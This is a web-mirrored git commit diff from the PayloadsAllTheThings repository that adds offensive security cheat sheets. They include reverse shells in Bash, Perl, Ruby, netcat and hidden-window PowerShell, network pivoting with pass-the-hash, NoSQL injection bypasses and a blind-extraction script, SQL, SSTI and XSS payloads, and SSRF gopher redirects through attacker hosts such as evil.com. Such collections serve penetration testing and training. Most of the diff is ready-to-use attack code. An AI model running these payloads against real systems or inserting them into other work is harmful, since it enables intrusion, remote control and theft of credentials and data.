mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Traversal Dir + NoSQL major updates + small addons
This commit is contained in:
parent
40fa20ec63
commit
b87c3fd7ff
@ -2,15 +2,32 @@
|
|||||||
|
|
||||||
## Reverse Shell Cheat Sheet
|
## Reverse Shell Cheat Sheet
|
||||||
|
|
||||||
Bash
|
Bash TCP
|
||||||
```bash
|
```bash
|
||||||
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
|
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
|
||||||
|
|
||||||
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
|
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bash UDP
|
||||||
|
```
|
||||||
|
Victim:
|
||||||
|
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
|
||||||
|
|
||||||
|
Listener:
|
||||||
|
nc -u -lvp 4242
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
Perl
|
Perl
|
||||||
```perl
|
```perl
|
||||||
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||||
|
|
||||||
|
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||||
|
|
||||||
|
|
||||||
|
NOTE: Windows only
|
||||||
|
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||||
```
|
```
|
||||||
|
|
||||||
Python
|
Python
|
||||||
@ -26,12 +43,21 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
|||||||
Ruby
|
Ruby
|
||||||
```ruby
|
```ruby
|
||||||
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||||||
|
|
||||||
|
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||||
|
|
||||||
|
NOTE: Windows only
|
||||||
|
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
Netcat
|
Netcat Traditional
|
||||||
|
```bash
|
||||||
|
nc -e /bin/sh [IPADDR] [PORT]
|
||||||
|
```
|
||||||
|
|
||||||
|
Netcat OpenBsd
|
||||||
```bash
|
```bash
|
||||||
nc -e /bin/sh 10.0.0.1 1234
|
|
||||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
|
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -41,6 +67,11 @@ ncat 127.0.0.1 4444 -e /bin/bash
|
|||||||
ncat --udp 127.0.0.1 4444 -e /bin/bash
|
ncat --udp 127.0.0.1 4444 -e /bin/bash
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Powershell
|
||||||
|
```powershell
|
||||||
|
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||||
|
```
|
||||||
|
|
||||||
Java
|
Java
|
||||||
```java
|
```java
|
||||||
r = Runtime.getRuntime()
|
r = Runtime.getRuntime()
|
||||||
@ -64,7 +95,32 @@ NodeJS
|
|||||||
})();
|
})();
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Spawn TTY
|
||||||
|
```
|
||||||
|
/bin/sh -i
|
||||||
|
```
|
||||||
|
|
||||||
|
(From an interpreter)
|
||||||
|
```
|
||||||
|
python -c 'import pty; pty.spawn("/bin/sh")'
|
||||||
|
perl -e 'exec "/bin/sh";'
|
||||||
|
perl: exec "/bin/sh";
|
||||||
|
ruby: exec "/bin/sh"
|
||||||
|
lua: os.execute('/bin/sh')
|
||||||
|
```
|
||||||
|
|
||||||
|
(From within vi)
|
||||||
|
```
|
||||||
|
:!bash
|
||||||
|
:set shell=/bin/bash:shell
|
||||||
|
```
|
||||||
|
|
||||||
|
(From within nmap)
|
||||||
|
```
|
||||||
|
!sh
|
||||||
|
```
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
|
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
|
||||||
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
|
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
|
||||||
|
* [Spawning a TTY Shell](http://netsec.ws/?p=337)
|
||||||
|
100
Methodology and Resources/Network Pivoting Techniques.md
Normal file
100
Methodology and Resources/Network Pivoting Techniques.md
Normal file
@ -0,0 +1,100 @@
|
|||||||
|
# Network Pivoting Techniques
|
||||||
|
|
||||||
|
## SSH
|
||||||
|
|
||||||
|
### SOCKS Proxy
|
||||||
|
```
|
||||||
|
ssh -D8080 [user]@[host]
|
||||||
|
|
||||||
|
ssh -N -f -D 9000 [user]@[host]
|
||||||
|
-f : ssh in background
|
||||||
|
-N : do not execute a remote command
|
||||||
|
```
|
||||||
|
|
||||||
|
### Local Port Forwarding
|
||||||
|
```
|
||||||
|
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Remote Port Forwarding
|
||||||
|
```
|
||||||
|
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
|
||||||
|
```
|
||||||
|
|
||||||
|
## Proxychains
|
||||||
|
**Config file**: /etc/proxychains.conf
|
||||||
|
```bash
|
||||||
|
[ProxyList]
|
||||||
|
socks4 localhost 8080
|
||||||
|
```
|
||||||
|
Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6`
|
||||||
|
|
||||||
|
## Web SOCKS - reGeorg
|
||||||
|
```
|
||||||
|
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
|
||||||
|
```
|
||||||
|
|
||||||
|
## Rpivot
|
||||||
|
|
||||||
|
Server (Attacker box)
|
||||||
|
```python
|
||||||
|
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
|
||||||
|
```
|
||||||
|
|
||||||
|
Client (Compromised box)
|
||||||
|
```python
|
||||||
|
python client.py --server-ip <ip> --server-port 9443
|
||||||
|
```
|
||||||
|
|
||||||
|
Through corporate proxy
|
||||||
|
```python
|
||||||
|
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
|
||||||
|
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
|
||||||
|
```
|
||||||
|
|
||||||
|
Passing the hash
|
||||||
|
```python
|
||||||
|
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
|
||||||
|
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
|
||||||
|
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Basic Pivoting Types
|
||||||
|
| Type | Use Case |
|
||||||
|
| :------------- | :------------------------------------------ |
|
||||||
|
| Listen - Listen | Exposed asset, may not want to connect out. |
|
||||||
|
| Listen - Connect | Normal redirect. |
|
||||||
|
| Connect - Connect | Can’t bind, so connect to bridge two hosts |
|
||||||
|
|
||||||
|
|
||||||
|
## Listen - Listen
|
||||||
|
| Type | Use Case |
|
||||||
|
| :------------- | :------------------------------------------ |
|
||||||
|
| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`|
|
||||||
|
| socat | `socat -v tcp-listen:8080 tcp-listen:9090` |
|
||||||
|
| remote host 1 | `ncat localhost 8080 < file` |
|
||||||
|
| remote host 2 | `ncat localhost 9090 > newfile` |
|
||||||
|
|
||||||
|
|
||||||
|
## Listen - Connect
|
||||||
|
| Type | Use Case |
|
||||||
|
| :------------- | :------------------------------------------ |
|
||||||
|
| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` |
|
||||||
|
| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` |
|
||||||
|
| remote host 1 | `ncat localhost -p 8080 < file` |
|
||||||
|
| remote host 2 | `ncat -l -p 9090 > newfile` |
|
||||||
|
|
||||||
|
|
||||||
|
## Connect - Connect
|
||||||
|
| Type | Use Case |
|
||||||
|
| :------------- | :------------------------------------------ |
|
||||||
|
| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` |
|
||||||
|
| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` |
|
||||||
|
| remote host 1 | `ncat -l -p 8080 < file |
|
||||||
|
| remote host 2 | `ncat -l -p 9090 > newfile` |
|
||||||
|
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
|
@ -47,6 +47,10 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
|||||||
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||||
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
|
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
|
||||||
```
|
```
|
||||||
|
Note: you may need to enable it with the following command
|
||||||
|
```
|
||||||
|
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||||
|
```
|
||||||
|
|
||||||
## Netuse (Windows)
|
## Netuse (Windows)
|
||||||
```
|
```
|
||||||
|
@ -3,9 +3,16 @@ NoSQL databases provide looser consistency restrictions than traditional SQL dat
|
|||||||
|
|
||||||
## Exploit
|
## Exploit
|
||||||
|
|
||||||
Basic authentication bypass using not equal ($ne)
|
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||||
```
|
```
|
||||||
|
in URL
|
||||||
username[$ne]=toto&password[$ne]=toto
|
username[$ne]=toto&password[$ne]=toto
|
||||||
|
|
||||||
|
in JSON
|
||||||
|
{"username": {"$ne": null}, "password": {"$ne": null} }
|
||||||
|
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
|
||||||
|
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Extract length information
|
Extract length information
|
||||||
@ -16,12 +23,39 @@ username[$ne]=toto&password[$regex]=.{3}
|
|||||||
|
|
||||||
Extract data information
|
Extract data information
|
||||||
```
|
```
|
||||||
|
in URL
|
||||||
username[$ne]=toto&password[$regex]=m.{2}
|
username[$ne]=toto&password[$regex]=m.{2}
|
||||||
username[$ne]=toto&password[$regex]=md.{1}
|
username[$ne]=toto&password[$regex]=md.{1}
|
||||||
username[$ne]=toto&password[$regex]=mdp
|
username[$ne]=toto&password[$regex]=mdp
|
||||||
|
|
||||||
username[$ne]=toto&password[$regex]=m.*
|
username[$ne]=toto&password[$regex]=m.*
|
||||||
username[$ne]=toto&password[$regex]=md.*
|
username[$ne]=toto&password[$regex]=md.*
|
||||||
|
|
||||||
|
in JSON
|
||||||
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
|
||||||
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
|
||||||
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Blind NoSQL
|
||||||
|
```python
|
||||||
|
import requests
|
||||||
|
import urllib3
|
||||||
|
import string
|
||||||
|
import urllib
|
||||||
|
urllib3.disable_warnings()
|
||||||
|
|
||||||
|
username="admin"
|
||||||
|
password=""
|
||||||
|
|
||||||
|
while True:
|
||||||
|
for c in string.printable:
|
||||||
|
if c not in ['*','+','.','?','|']:
|
||||||
|
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
|
||||||
|
r = requests.post(u, data = {'ids': payload}, verify = False)
|
||||||
|
if 'OK' in r.text:
|
||||||
|
print("Found one more char : %s" % (password+c))
|
||||||
|
password += c
|
||||||
```
|
```
|
||||||
|
|
||||||
## MongoDB Payloads
|
## MongoDB Payloads
|
||||||
@ -47,6 +81,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* https://www.dailysecurity.fr/nosql-injections-classique-blind/
|
* https://www.dailysecurity.fr/nosql-injections-classique-blind/
|
||||||
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection
|
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection
|
||||||
* https://github.com/cr0hn/nosqlinjection_wordlists
|
* https://github.com/cr0hn/nosqlinjection_wordlists
|
||||||
|
* https://zanon.io/posts/nosql-injection-in-mongodb
|
||||||
|
@ -33,6 +33,12 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126))
|
|||||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Shorter to read:
|
||||||
|
```
|
||||||
|
' and updatexml(null,concat(0x0a,version()),null)-- -
|
||||||
|
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
||||||
|
```
|
||||||
|
|
||||||
## MYSQL Error Based - Extractvalue function
|
## MYSQL Error Based - Extractvalue function
|
||||||
```
|
```
|
||||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||||
|
@ -35,6 +35,12 @@ Using this vulnerability users can upload images from any image URL = trigger an
|
|||||||
```
|
```
|
||||||
|
|
||||||
## Bypassing filters
|
## Bypassing filters
|
||||||
|
Bypass using HTTPS
|
||||||
|
```
|
||||||
|
https://127.0.0.1/
|
||||||
|
https://localhost/
|
||||||
|
```
|
||||||
|
|
||||||
Bypass localhost with [::]
|
Bypass localhost with [::]
|
||||||
```
|
```
|
||||||
http://[::]:80/
|
http://[::]:80/
|
||||||
@ -53,6 +59,7 @@ http://0000::1:3128/ Squid
|
|||||||
|
|
||||||
Bypass localhost with a domain redirecting to locahost
|
Bypass localhost with a domain redirecting to locahost
|
||||||
```
|
```
|
||||||
|
http://localtest.me
|
||||||
http://n-pn.info
|
http://n-pn.info
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -144,6 +151,37 @@ You didn't say the magic word !
|
|||||||
QUIT
|
QUIT
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Gopher:// SMTP - Back connect to 1337
|
||||||
|
```php
|
||||||
|
Content of evil.com/redirect.php:
|
||||||
|
<?php
|
||||||
|
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
|
||||||
|
?>
|
||||||
|
|
||||||
|
Now query it.
|
||||||
|
https://example.com/?q=http://evil.com/redirect.php.
|
||||||
|
```
|
||||||
|
Gopher:// SMTP - send a mail
|
||||||
|
```php
|
||||||
|
Content of evil.com/redirect.php:
|
||||||
|
<?php
|
||||||
|
$commands = array(
|
||||||
|
'HELO victim.com',
|
||||||
|
'MAIL FROM: <admin@victim.com>',
|
||||||
|
'RCPT To: <sxcurity@oou.us>',
|
||||||
|
'DATA',
|
||||||
|
'Subject: @sxcurity!',
|
||||||
|
'Corben was here, woot woot!',
|
||||||
|
'.'
|
||||||
|
);
|
||||||
|
|
||||||
|
$payload = implode('%0A', $commands);
|
||||||
|
|
||||||
|
header('Location: gopher://0:25/_'.$payload);
|
||||||
|
?>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## SSRF on AWS Bucket
|
## SSRF on AWS Bucket
|
||||||
Interesting path to look for at http://169.254.169.254
|
Interesting path to look for at http://169.254.169.254
|
||||||
```
|
```
|
||||||
@ -191,3 +229,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
|
|||||||
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
|
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
|
||||||
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
|
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
|
||||||
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
|
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
|
||||||
|
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
|
||||||
|
@ -2,19 +2,47 @@
|
|||||||
|
|
||||||
Template injection allows an attacker to include template code into an existant (or not) template.
|
Template injection allows an attacker to include template code into an existant (or not) template.
|
||||||
|
|
||||||
|
## Ruby
|
||||||
|
#### Basic injection
|
||||||
|
```python
|
||||||
|
<%= 7 * 7 %>
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Retrieve /etc/passwd
|
||||||
|
```python
|
||||||
|
<%= File.open('/etc/passwd').read %>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Java
|
||||||
|
#### Basic injection
|
||||||
|
```java
|
||||||
|
${{7*7}}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Retrieve the system’s environment variables.
|
||||||
|
```java
|
||||||
|
${T(java.lang.System).getenv()}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Retrieve /etc/passwd
|
||||||
|
```java
|
||||||
|
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||||
|
```
|
||||||
|
|
||||||
## Jinja2
|
## Jinja2
|
||||||
[Official website](http://jinja.pocoo.org/)
|
[Official website](http://jinja.pocoo.org/)
|
||||||
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||||
|
|
||||||
Basic injection
|
#### Basic injection
|
||||||
```
|
```python
|
||||||
{{4*4}}[[5*5]]
|
{{4*4}}[[5*5]]
|
||||||
```
|
```
|
||||||
|
|
||||||
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
||||||
The above injections have been tested on Flask application.
|
The above injections have been tested on Flask application.
|
||||||
#### Template format
|
#### Template format
|
||||||
```
|
```python
|
||||||
{% extends "layout.html" %}
|
{% extends "layout.html" %}
|
||||||
{% block body %}
|
{% block body %}
|
||||||
<ul>
|
<ul>
|
||||||
@ -27,7 +55,7 @@ The above injections have been tested on Flask application.
|
|||||||
```
|
```
|
||||||
|
|
||||||
#### Dump all used classes
|
#### Dump all used classes
|
||||||
```
|
```python
|
||||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -40,7 +68,7 @@ The above injections have been tested on Flask application.
|
|||||||
```
|
```
|
||||||
|
|
||||||
#### Read remote file
|
#### Read remote file
|
||||||
```
|
```python
|
||||||
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||||
```
|
```
|
||||||
@ -62,8 +90,9 @@ Inject this template
|
|||||||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Ressources & Sources
|
## Thanks to
|
||||||
[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||||
|
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||||
|
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||||
#### Training
|
#### Training
|
||||||
[https://w3challs.com/](https://w3challs.com/)
|
[https://w3challs.com/](https://w3challs.com/)
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
|
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
|
||||||
|
|
||||||
## Exploit
|
## Exploit
|
||||||
|
Basic
|
||||||
```
|
```
|
||||||
../
|
../
|
||||||
..\
|
..\
|
||||||
@ -16,5 +16,28 @@ A directory traversal consists in exploiting insufficient security validation /
|
|||||||
...\.\
|
...\.\
|
||||||
```
|
```
|
||||||
|
|
||||||
|
16 bit Unicode encoding
|
||||||
|
```
|
||||||
|
. = %u002e
|
||||||
|
/ = %u2215
|
||||||
|
\ = %u2216
|
||||||
|
```
|
||||||
|
|
||||||
|
Double URL encoding
|
||||||
|
```
|
||||||
|
. = %252e
|
||||||
|
/ = %252f
|
||||||
|
\ = %255c
|
||||||
|
```
|
||||||
|
|
||||||
|
UTF-8 Unicode encoding
|
||||||
|
```
|
||||||
|
. = %c0%2e, %e0%40%ae, %c0ae
|
||||||
|
/ = %c0%af, %e0%80%af, %c0%2f
|
||||||
|
\ = %c0%5c, %c0%80%5c
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
*
|
* https://twitter.com/huykha10/status/962419695470174208
|
||||||
|
@ -100,6 +100,7 @@ io.swf?yid=\"));}catch(e){alert(1);}//
|
|||||||
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
|
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
|
||||||
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
|
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
|
||||||
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
|
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
|
||||||
|
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS in Hidden input
|
XSS in Hidden input
|
||||||
@ -113,6 +114,20 @@ DOM XSS
|
|||||||
#"><img src=/ onerror=alert(2)>
|
#"><img src=/ onerror=alert(2)>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
|
||||||
|
```
|
||||||
|
-(confirm)(document.domain)//
|
||||||
|
; alert(1);//
|
||||||
|
```
|
||||||
|
|
||||||
|
XSS URL
|
||||||
|
```
|
||||||
|
URL/<svg onload=alert(1)>
|
||||||
|
URL/<script>alert('XSS');//
|
||||||
|
URL/<input autofocus onfocus=alert(1)>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## XSS in wrappers javascript and data URI
|
## XSS in wrappers javascript and data URI
|
||||||
XSS with javascript:
|
XSS with javascript:
|
||||||
```
|
```
|
||||||
@ -609,6 +624,11 @@ Little Endian : 0xFF 0xFE 0x00 0x00
|
|||||||
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
|
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
|
||||||
|
//google.com/complete/search?client=chrome&jsonp=alert(1);
|
||||||
|
```
|
||||||
|
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
|
||||||
|
```
|
||||||
|
|
||||||
Bypass using weird encoding or native interpretation to hide the payload (alert())
|
Bypass using weird encoding or native interpretation to hide the payload (alert())
|
||||||
```javascript
|
```javascript
|
||||||
@ -619,9 +639,6 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
|
|||||||
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!